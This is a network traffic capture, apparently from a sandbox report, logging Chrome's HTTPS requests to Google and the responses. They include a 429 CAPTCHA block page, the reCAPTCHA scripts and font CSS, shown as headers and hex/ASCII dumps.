                                                                                                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:07 GMT
                                                                                                                                                    Server: gws
                                                                                                                                                    Content-Length: 398
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Set-Cookie: 1P_JAR=2024-02-21-07; expires=Fri, 22-Mar-2024 07:14:07 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                    Set-Cookie: AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w; expires=Mon, 19-Aug-2024 07:14:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:14:07 UTC398INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 61 6d 70 3b 71 3d 45 67 53 5f 59 4f 50 65 47 4c 37 46 31
                                                                                                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/&amp;q=EgS_YOPeGL7F1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.549715142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:07 UTC1106OUTGET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:07 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:07 GMT
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Server: HTTP server (unknown)
                                                                                                                                                    Content-Length: 3056
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:14:07 UTC896INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74
                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/</title></head><body style="font
                                                                                                                                                    2024-02-21 07:14:07 UTC1252INData Raw: 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 78 7a 33 4c 73 44 68 6e 56 4b 57 4e 44 50 41 78 59 73 66 53 61 69 2d 36 35 67 51 66 55 57 42 35 35 4c 38 54 46 75 62 68 63 51 71 4a 6c 72 6c 74 62
                                                                                                                                                    Data Ascii: esponse) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltb
                                                                                                                                                    2024-02-21 07:14:07 UTC908INData Raw: 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e 67 20 74 68 65 20 61 62 6f 76 65 20 43 41 50 54 43 48 41 20 77 69 6c 6c 20 6c 65 74 20 79 6f 75
                                                                                                                                                    Data Ascii: sts coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.549717142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:07 UTC1123OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:08 UTC528INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                                    Expires: Wed, 21 Feb 2024 07:14:08 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:08 GMT
                                                                                                                                                    Cache-Control: private, max-age=300
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:08 UTC724INData Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                    Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                    2024-02-21 07:14:08 UTC505INData Raw: 6d 56 34 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 37 2b 49 52 4c 78 6b 6c 31 7a 36 71 72 2f
                                                                                                                                                    Data Ascii: mV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-7+IRLxkl1z6qr/
                                                                                                                                                    2024-02-21 07:14:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.2.549720142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:09 UTC1730OUTGET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                    Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:09 UTC891INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:09 GMT
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JydsAVeFWYBeKXtw5mYR8g' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:09 UTC361INData Raw: 32 61 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b
                                                                                                                                                    Data Ascii: 2abf<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face {
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66
                                                                                                                                                    Data Ascii: o/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//f
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20
                                                                                                                                                    Data Ascii: 9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a
                                                                                                                                                    Data Ascii: 0-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}
                                                                                                                                                    2024-02-21 07:14:09 UTC1252INData Raw: 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41 2c
                                                                                                                                                    Data Ascii: */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA,
